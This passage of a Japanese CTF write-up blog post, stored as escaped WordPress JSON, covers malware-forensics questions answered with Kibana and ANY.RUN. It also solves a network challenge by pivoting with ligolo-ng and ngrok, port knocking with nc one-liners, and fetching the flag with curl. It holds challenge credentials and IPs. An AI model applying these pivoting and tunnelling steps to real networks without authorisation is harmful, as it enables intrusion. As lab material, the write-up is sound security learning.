\u3067\u3042\u308b\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: DCTF{T1036}<\/code><\/pre>\n\n\n\n
Q8. How many child processes did the svchost had? (Points: 15)<\/h3>\n\n\n\n
\u89aa\u30d7\u30ed\u30bb\u30b9\u304c C:\\Users\\malware\\AppData\\Roaming\\svchost.exe<\/code> \u3067\u3042\u308b\u30d7\u30ed\u30bb\u30b9\u306e\u6570\u3092\u8abf\u3079\u308c\u3070\u3088\u3044\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: 3<\/code><\/pre>\n\n\n\n
Q9. What is the name of the file that is created on desktop after second malware (Points: 21)<\/h3>\n\n\n\n
Kibana\u3067\u30c7\u30b9\u30af\u30c8\u30c3\u30d7\u4e0a\u306b\u5bfe\u3059\u308b FileCreate<\/code> \u30a4\u30d9\u30f3\u30c8\u3092\u8abf\u67fb\u3057\u3066 java-attacher.jar<\/code> \u304c\u51fa\u3066\u304f\u308b\u304c\u3053\u308c\u306f\u4e0d\u6b63\u89e3\u3060\u3063\u305f\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
\u554f\u984c\u6587\u304c “What is the name of the file that is created ~” \u3068\u73fe\u5728\u5f62\u306b\u306a\u3063\u3066\u3044\u308b\u3053\u3068\u304b\u3089\u3001Elasticsearch\u306e\u30ed\u30b0\u304b\u3089\u8abf\u3079\u308b\u306e\u3067\u306f\u306a\u304f\u3066\u516c\u958b\u60c5\u5831\u304b\u3089\u63a2\u3059\u3082\u306e\u3068\u63a8\u6e2c\u3057\u3066\u8abf\u67fb\u3002ANY.RUN<\/a>\u306e svchost.exe<\/code> \u306e\u8a73\u7d30\u60c5\u5831\u304b\u3089\u30c7\u30b9\u30af\u30c8\u30c3\u30d7\u306b GOATEDSIGMA<\/code> \u3068\u3044\u3046\u30d5\u30a1\u30a4\u30eb\u3092\u4f5c\u6210\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: DCTF{GOATEDSIGMA}<\/code><\/pre>\n\n\n\n
Q10. What is the discord username of the hacker in the second malware behavior? (Points: 26)<\/h3>\n\n\n\n
\u540c\u3058\u304fANY.RUN<\/a>\u306e\u30b9\u30af\u30ea\u30fc\u30f3\u30b7\u30e7\u30c3\u30c8\u304b\u3089Discord\u306e\u30e6\u30fc\u30b6\u540d\u304c\u308f\u304b\u308b\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
Flag: DCTF{realba3t}<\/code><\/pre>\n\n\n\n
[Network][Easy] hidden-cipher (24 solves, 380 pt)<\/h2>\n\n\n\n
\n
How good is your understanding of networks? In this challenge, you\u2019ll explore the basics of how computers talk to each other. Look at the traffic, identify what\u2019s happening, and piece together the hidden information. Use the following: ssh root@target -p port 5d6287sgagGD18G7Ubhq2<\/p>\n<\/blockquote>\n\n\n\n
\u96e3\u6613\u5ea6\u8a50\u6b3a\u3002\u3068\u306f\u3044\u3048High\u3067\u306f\u306a\u304fMedium\u304f\u3089\u3044\u3060\u3068\u601d\u3046\u3002SSH\u3067\u63a5\u7d9a\u3067\u304d\u308b\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u304c\u4e0e\u3048\u3089\u308c\u308b\u3002IP\/Port\u306f\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u8d77\u52d5\u3054\u3068\u306b\u5909\u308f\u308b\u3002\u4ee5\u4e0b\u3067\u306fIP\u3084\u30dd\u30fc\u30c8\u3001\u30db\u30b9\u30c8\u540d\u304c\u5909\u308f\u308b\u3053\u3068\u304c\u3042\u308b\u304c\u305d\u308c\u306f\u30a4\u30f3\u30b9\u30bf\u30f3\u30b9\u304c\u7570\u306a\u308b\u305f\u3081\u3002\u554f\u984c\u6587\u306e\u6700\u5f8c\u306e\u8b0e\u306e\u6587\u5b57\u5217\u306f\u30d1\u30b9\u30ef\u30fc\u30c9\u3002<\/p>\n\n\n\n
Q1. What is the flag? (Points: 380)<\/h3>\n\n\n\n
SSH\u63a5\u7d9a\u3057\u305f\u5148\u306fUbuntu\u306eDocker\u30b3\u30f3\u30c6\u30ca\u3068\u306a\u3063\u3066\u304a\u308a\u3001\u4e3b\u8981\u306a\u30b3\u30de\u30f3\u30c9\u304c\u4f55\u4e00\u3064\u306a\u3044\u3002<\/p>\n\n\n
\n$ ssh root@35.198.141.47 -p 31246\nroot@35.198.141.47's password:\nPermission denied, please try again.\nroot@35.198.141.47's password:\nWelcome to Ubuntu 24.04.1 LTS (GNU\/Linux 6.6.97+ x86_64)\n\n * Documentation:  https:\/\/help.ubuntu.com\n * Management:     https:\/\/landscape.canonical.com\n * Support:        https:\/\/ubuntu.com\/pro\n\nThis system has been minimized by removing packages and content that are\nnot required on a system that users do not log into.\n\nTo restore this content, you can run the 'unminimize' command.\nLast login: Sat Sep 13 21:35:33 2025 from 217.178.17.119\nroot@c-d355-c9639t-l3408-hidden-chiper-84f7d6c75d-x9952:~#\n<\/pre><\/div>\n\n\n
ls<\/code> \u3059\u308b\u3068\u30d5\u30a1\u30a4\u30eb\u304c1\u3064\u3060\u3051\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u3002<\/p>\n\n\n
\nroot@c-d355-c9639t-l3408-hidden-chiper-84f7d6c75d-x9952:~# ls\ncapture.pcap\n<\/pre><\/div>\n\n\n
\u307e\u305a\u306f\u3053\u308c\u3092 scp<\/code> \u3067\u53d6\u5f97\u3057\u3066\u89e3\u6790\u3002Wireshark\u306eConversations\u3092\u898b\u3066\u307f\u308b\u3068\u3001\u3044\u304f\u3064\u304b\u306e\u30db\u30b9\u30c8\u3068\u901a\u4fe1\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u3002\u30b0\u30ed\u30fc\u30d0\u30ebIP\u306fUbuntu\u306e\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\u901a\u4fe1\u306a\u306e\u3067\u7121\u8996\u3057\u3066\u3088\u3044\u3002<\/p>\n\n\n\n
\u307e\u305a\u30ed\u30fc\u30ab\u30eb\u3067\u306e\u901a\u4fe1\u3092\u898b\u308b\u3068DNS\u901a\u4fe1\u3067\u3001”hidden-cipher-target” \u304c “172.18.0.3” \u3067\u3042\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
“hidden-cipher-target” \u3068\u3044\u3046\u3053\u3068\u306a\u306e\u3067\u3053\u3053\u306b\u5bfe\u3059\u308b\u901a\u4fe1\u3092\u8a73\u3057\u304f\u898b\u3066\u3044\u304f\u3002<\/p>\n\n\n\n
\"\"<\/a><\/figure>\n\n\n\n
\u4ee5\u4e0b\u306e\u901a\u4fe1\u304c\u884c\u308f\u308c\u3066\u3044\u305f\u3002<\/p>\n\n\n\n
    \n
  1. 4321\/udp \u306b hi<\/code> \u3092\u9001\u4fe1\u3002\u5fdc\u7b54\u306f\u7121\u3057\u3002<\/li>\n\n\n\n
  2. 1234\/tcp \u306b\u63a5\u7d9a\u3002\u5373\u5207\u65ad\u3002<\/li>\n\n\n\n
  3. 5432\/udp \u306b hi<\/code> \u3092\u9001\u4fe1\u3002\u5fdc\u7b54\u306f\u7121\u3057\u3002<\/li>\n\n\n\n
  4. 2345\/tcp \u306b\u63a5\u7d9a\u3002\u5373\u5207\u65ad\u3002<\/li>\n\n\n\n
  5. 9999\/tcp \u306b\u63a5\u7d9a\u3002\u5373\u5207\u65ad\u3002<\/li>\n<\/ol>\n\n\n\n
    TCP\u30aa\u30d7\u30b7\u30e7\u30f3\u306a\u3069\u3067\u5909\u306a\u30c7\u30fc\u30bf\u304c\u57cb\u3081\u8fbc\u307e\u308c\u3066\u3044\u305f\u308a\u3057\u306a\u3044\u304b\u3068\u898b\u3066\u307f\u305f\u304c\u305d\u3046\u3044\u3046\u3082\u306e\u306f\u7121\u3057\u3002<\/p>\n\n\n\n
    pcap\u30d5\u30a1\u30a4\u30eb\u306e\u8abf\u67fb\u304b\u3089\u4ed6\u306e\u30b3\u30f3\u30d4\u30e5\u30fc\u30bf\u306b\u5bfe\u3057\u3066\u306e\u901a\u4fe1\u3092\u767a\u751f\u3055\u305b\u306a\u3051\u308c\u3070\u306a\u3089\u306a\u3044\u53ef\u80fd\u6027\u304c\u3042\u308b\u304c\u3001\u307b\u3068\u3093\u3069\u306e\u30b3\u30de\u30f3\u30c9\u304c\u4f7f\u3048\u306a\u3044\u305f\u3081ligolo-ng<\/a>\u3067Pivoting\u3059\u308b\u3053\u3068\u306b\u3057\u305f\u3002Pivoting\u306b\u3064\u3044\u3066\u306fOffensive Security Articles Vol.3\u3067\u66f8\u3044\u305f\u306e\u3067\u6c17\u306b\u306a\u308b\u4eba\u306f\u898b\u3066\u307b\u3057\u3044\u3002<\/p>\n\n\n
    \n\t
    \n\t\t\n\t\t\t\t\t\t\t
    \n\t\t\t\t\t\"\"\n\t\t\t\t<\/figure>\n\t\t\t\t\t\t
    \n\t\t\t\t
    Offensive Security Articles Vol.3\uff1aOffensive Security Lab Japan<\/div>\n\t\t\t\t
    \u672c\u66f8\u306f\u3001\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30b3\u30df\u30e5\u30cb\u30c6\u30a3\u306e\u4e00\u3064\u3067\u3042\u308bOffensive Security Lab Japan \u306e\u6709\u5fd7\u306b\u3088\u308b\u30aa\u30d5\u30a7\u30f3\u30b7\u30d6\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306b\u7279\u5316\u3057\u305f\u6280\u8853\u89e3\u8aac\u66f8\u306e\u30dc\u30ea\u30e5\u30fc\u30e0\uff13\u3067\u3059\u3002\u30aa\u30d5\u30a7\u30f3\u30b7\u30d6\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306b\u95a2\u3059\u308b\u69d8\u3005\u306a\u30c8\u30d4\u30c3\u30af\u30b9\u304c\u8a70\u3081\u5408\u3055\u308c\u305f\u6280\u8853\u66f8\u3068\u306a\u3063\u3066\u3044\u307e\u3059\u306e\u3067\u3001\u8208\u5473\u306e\u3042\u308b\u7ae0\u304b\u3089\u8aad\u3093\u3067\u3044\u305f\u3060\u304f\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\u672c\u66f8\u306e\u5185\u5bb9\u304c\u3001\u30b5\u30a4\u30d0\u30fc\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u306b\u95a2\u308f\u308b\u30a8\u30f3\u30b8\u30cb\u30a2\u3060\u3051\u3067\u306a\u304f\u3001\u591a\u304f\u306e\u30a8\u30f3\u30b8\u30cb\u30a2\u306b\u3068\u3063\u3066\u6709\u76ca\u306a\u3082\u306e\u306b\u306a\u308c\u3070\u5e78\u3044\u3067\u3059\u3002<\/div>\n\t\t\t\t
    \n\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t\t\t
    techbookfest.org<\/div>\n\t\t\t\t<\/div>\n\t\t\t<\/div>\n\t\t<\/a>\n\t<\/article>\n<\/div>\n\n\n\n
    \u30a8\u30fc\u30b8\u30a7\u30f3\u30c8\u306f scp<\/code> \u3067\u9001\u308a\u8fbc\u3093\u3067\u5b9f\u884c\u3002\u30b5\u30fc\u30d0\u5074\u306fNAT\u306e\u4e2d\u306a\u306e\u3067ngrok<\/a>\u3092\u4f7f\u3063\u3066\u30a4\u30f3\u30bf\u30fc\u30cd\u30c3\u30c8\u304b\u3089\u30a2\u30af\u30bb\u30b9\u53ef\u80fd\u306b\u3057\u305f\u3002<\/p>\n\n\n\n
    \"\"<\/a><\/figure>\n\n\n\n
    eth0<\/code> \u306e\u60c5\u5831\u3092\u898b\u308b\u3068 \/32<\/code> \u3068\u306a\u3063\u3066\u304a\u308a\u3001\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u5185\u306b\u4ed6\u306b\u30db\u30b9\u30c8\u304c\u7121\u3044\u3053\u3068\u304c\u308f\u304b\u308b\u3002<\/p>\n\n\n\n
    SSH\u30db\u30b9\u30c8\u306e\u307f\u3067\u4f55\u304b\u3092\u3057\u306a\u3051\u308c\u3070\u306a\u3089\u306a\u3044\u305f\u3081\u3001\u4eca\u5ea6\u306f\u30db\u30b9\u30c8\u5185\u3092\u8abf\u67fb\u3002\u30b3\u30de\u30f3\u30c9\u306f\u4f7f\u3048\u306a\u3044\u304cLinux\u306a\u306e\u3067 \/proc\/net<\/code> \u3092\u898b\u308c\u3070\u4f55\u304b\u308f\u304b\u308b\u3060\u308d\u3046\u3068\u63a2\u7d22\u3002<\/p>\n\n\n
    \nroot@c-d355-c9639t-l3408-hidden-chiper-84f7d6c75d-kcmnj:\/proc\/net# cat tcp\n  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                     \n   0: 00000000:0929 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 635718 1 0000000000000000 100 0 0 10 0                    \n   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 637714 1 0000000000000000 100 0 0 10 0                    \n   2: 00000000:270F 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 636680 1 0000000000000000 100 0 0 10 0                    \n   3: 00000000:04D2 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 635715 1 0000000000000000 100 0 0 10 0                    \n   4: 3701240A:0016 7711B2D9:A030 01 000001DC:00000000 01:0000002C 00000000     0        0 830554 4 0000000000000000 44 4 29 7 7                     \n   5: 3701240A:B946 EEB9B439:2DBA 01 00000000:00000000 02:0000024D 00000000     0        0 813335 2 0000000000000000 44 4 31 10 -1                   \n   6: 3701240A:0016 7711B2D9:4C25 01 00000000:00000000 02:00004562 00000000     0        0 804951 2 0000000000000000 45 4 30 10 -1                   \n   7: 3701240A:0016 C60CDA7E:D18D 01 00000000:00000000 02:00000000 00000000     0        0 780464 2 0000000000000000 45 4 1 10 16\n<\/pre><\/div>\n\n
    \nroot@c-d355-c9639t-l3408-hidden-chiper-84f7d6c75d-kcmnj:\/proc\/net# cat udp\n   sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode ref pointer drops            \n 3006: 00000000:10E1 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 635714 2 0000000000000000 0        \n 4117: 00000000:1538 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 635717 2 0000000000000000 0 \n<\/pre><\/div>\n\n\n
    TCP\u3068UDP\u306e\u30c6\u30fc\u30d6\u30eb\u3092\u898b\u308b\u3068\u3001TCP\u3067\u306f22, 1234, 2345, 9999\u756a\u30dd\u30fc\u30c8\u3067\u5f85\u3061\u53d7\u3051\u3066\u304a\u308a\u3001UDP\u3067\u306f4321, 5432\u756a\u30dd\u30fc\u30c8\u3067\u5f85\u3061\u53d7\u3051\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308b\u300222\u756a\u3092\u9664\u304f\u3068 capture.pcap<\/code> \u3067\u78ba\u8a8d\u3057\u305f hidden-cipher-target<\/code> \u306b\u5bfe\u3059\u308b\u901a\u4fe1\u306e\u5b9b\u5148\u30dd\u30fc\u30c8\u3068\u4e00\u81f4\u3057\u3066\u3044\u308b\u3002<\/p>\n\n\n\n
    \u305d\u308c\u305e\u308c\u901a\u4fe1\u3092\u8a66\u307f\u3066\u307f\u308b\u3082\u3001UDP\u306b\u5bfe\u3059\u308b\u5fdc\u7b54\u306f\u7121\u304f\u3001TCP\u63a5\u7d9a\u306f\u78ba\u7acb\u5f8c\u5373\u5207\u65ad\u3055\u308c\u3066\u3057\u307e\u3046\u3002<\/p>\n\n\n\n
    \u3053\u3053\u3067\u3001knockd<\/code> \u3068\u3044\u3046\u8a00\u8449\u304c\u6d6e\u304b\u3073\u3001capture.pcap<\/code> \u306b\u3042\u308b\u901a\u308a\u306e\u9806\u756a\u3067\u901a\u4fe1\u3057\u3066\u307f\u308b\u3053\u3068\u306b\u3057\u305f\u3002<\/p>\n\n\n
    \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ echo -n hi | nc -u -w 2 10.36.1.55 4321; nc 10.36.1.55 1234; echo -n hi | nc -u -w 2 10.36.1.55 5432; nc 10.36.1.55 2345; nc 10.36.1.55 9999\n<\/pre><\/div>\n\n\n
    TCP\u306e\u30c6\u30fc\u30d6\u30eb\u3092\u518d\u5ea6\u78ba\u8a8d\u3057\u3066\u307f\u308b\u3068\u3001\u65b0\u305f\u306b4000\u756a\u30dd\u30fc\u30c8\u304c\u958b\u3044\u3066\u3044\u305f\u3002<\/p>\n\n\n
    \nroot@c-d355-c9639t-l3408-hidden-chiper-84f7d6c75d-kcmnj:\/proc\/net# cat tcp\n  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                                     \n   0: 00000000:0929 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 635718 1 0000000000000000 100 0 0 10 0                    \n   1: 00000000:0FA0 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 972471 1 0000000000000000 100 0 0 10 0                    \n   2: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 637714 1 0000000000000000 100 0 0 10 0                    \n   3: 00000000:270F 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 636680 1 0000000000000000 100 0 0 10 0                    \n   4: 00000000:04D2 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 635715 1 0000000000000000 100 0 0 10 0                    \n   5: 3701240A:270F 3701240A:9208 06 00000000:00000000 03:000011D4 00000000     0        0 0 3 0000000000000000                                      \n   6: 3701240A:0016 7711B2D9:A030 01 00000034:00000000 01:0000002C 00000000     0        0 830554 4 0000000000000000 44 4 31 7 7                     \n   7: 3701240A:0929 3701240A:ADC8 06 00000000:00000000 03:000011B4 00000000     0        0 0 3 0000000000000000                                      \n   8: 3701240A:0016 86D441CF:DC90 01 00000000:00000000 02:00000E31 00000000     0        0 873760 2 0000000000000000 44 4 31 10 -1                   \n   9: 3701240A:B946 EEB9B439:2DBA 01 00000000:00000000 02:00000060 00000000     0        0 813335 2 0000000000000000 43 4 26 12 -1                   \n  10: 3701240A:04D2 3701240A:868C 06 00000000:00000000 03:00001000 00000000     0        0 0 3 0000000000000000                                      \n  11: 3701240A:0016 7711B2D9:4C25 01 00000000:00000000 02:000004C6 00000000     0        3 804951 2 0000000000000000 45 4 30 10 -1                   \n  12: 3701240A:0016 C60CDA7E:D18D 01 00000000:00000000 02:00000323 00000000     0        0 780464 2 0000000000000000 45 4 1 53 33         \n<\/pre><\/div>\n\n\n
    4000\u756a\u30dd\u30fc\u30c8\u306b\u30a2\u30af\u30bb\u30b9\u3057\u3066\u307f\u308b\u3068HTTP\u30b5\u30fc\u30d0\u304c\u52d5\u3044\u3066\u3044\u308b\u3088\u3046\u3060\u3063\u305f\u306e\u3067 curl<\/code> \u3067\u30a2\u30af\u30bb\u30b9\u3057\u3066\u307f\u305f\u3068\u3053\u308d\u30d5\u30e9\u30b0\u3092\u7372\u5f97\u3002<\/p>\n\n\n
    \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ nc 10.36.1.55 4000                  \nhi\n&lt;!DOCTYPE HTML>\n&lt;html lang="en">\n    &lt;head>\n        &lt;meta charset="utf-8">\n        &lt;title>Error response&lt;\/title>\n    &lt;\/head>\n    &lt;body>\n        &lt;h1>Error response&lt;\/h1>\n        &lt;p>Error code: 400&lt;\/p>\n        &lt;p>Message: Bad request syntax ('hi').&lt;\/p>\n        &lt;p>Error code explanation: 400 - Bad request syntax or unsupported method.&lt;\/p>\n    &lt;\/body>\n&lt;\/html>\n                                                                                                                      \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ curl 10.36.1.55 4000\ncurl: (7) Failed to connect to 10.36.1.55 port 80 after 306 ms: Could not connect to server\n^C\n                                                                                                                      \n\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ curl 10.36.1.55:4000\nctf{3f476bbefba34d117a3f11275797d5249ae0cf9dfbd4b51047cc54423883e92e}\n<\/pre><\/div>\n\n\n
    Flag: ctf{3f476bbefba34d117a3f11275797d5249ae0cf9dfbd4b51047cc54423883e92e}<\/code><\/pre>\n\n\n\n
    Docker\u30b3\u30f3\u30c6\u30ca\u3067\u306a\u3051\u308c\u3070\u3082\u3046\u5c11\u3057\u96e3\u6613\u5ea6\u306f\u4f4e\u304b\u3063\u305f\u306e\u304b\u3068\u601d\u3046\u3002\u4eca\u306f\u78ba\u8a8d\u3067\u304d\u306a\u3044\u304c\u3001\u3082\u3057\u304b\u3057\u305f\u3089 \/dev\/tcp\/{IP}\/{Port}<\/code> \u3078\u306e\u30ea\u30c0\u30a4\u30ec\u30af\u30c8\u3067\u4f55\u3068\u304b\u51fa\u6765\u305f\u306e\u304b\u3082\u3057\u308c\u306a\u3044\u3002<\/p>\n\n\n\n
    \u304a\u308f\u308a\u306b<\/h2>\n\n\n\n
    \u70b9\u6570\u304b\u3089\u8003\u3048\u308b\u3068\u3001\u9ad81\u554f\u3001\u4e2d1\u554f\u3001\u4f4e2\u554f\u3068\u3044\u3063\u305f\u3068\u3053\u308d\u3067\u305d\u308c\u306a\u308a\u306b\u8ca2\u732e\u3067\u304d\u3066\u3088\u304b\u3063\u305f\u3002\u30eb\u30fc\u30de\u30cb\u30a2\u884c\u3051\u308b\u3068\u3044\u3044\u306a\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
    \u30c1\u30fc\u30e0\u3067\u53c2\u52a0\u3057\u3066\u305f\u3002\u4e0a\u4f4d10\u30c1\u30fc\u30e0\u304c\u30eb\u30fc\u30de\u30cb\u30a2\u3067\u306e\u6c7a\u52dd\u306b\u884c\u3051\u308b\u3002\u4e0a\u4f4d30\u30c1\u30fc\u30e0\u306fwriteup\u306e\u63d0\u51fa\u304c\u5fc5\u9808\u3002\u3068\u3044\u3046\u3053\u3068\u306f7\u30c1\u30fc\u30e0\u63d0\u51fa\u3057\u306a\u3051\u308c\u3070\u30eb\u30fc\u30de\u30cb\u30a2\u306b\u884c\u3051\u308b\u3002\u3055\u3059\u304c\u306b\u305d\u308c\u306f\u306a\u3044\u3060\u308d\u3046\u3002\u6b8b\u5ff5\u3002 \u81ea\u5206\u306f4\u554f\u89e3\u3044\u305f\u3002Eas […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"","footnotes":""},"categories":[14],"tags":[8],"class_list":["post-1258","post","type-post","status-publish","format-standard","hentry","category-ctf","tag-ctf"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts\/1258","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/comments?post=1258"}],"version-history":[{"count":5,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts\/1258\/revisions"}],"predecessor-version":[{"id":1293,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/posts\/1258\/revisions\/1293"}],"wp:attachment":[{"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/media?parent=1258"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/categories?post=1258"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/emeth.jp\/diary\/wp-json\/wp\/v2\/tags?post=1258"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}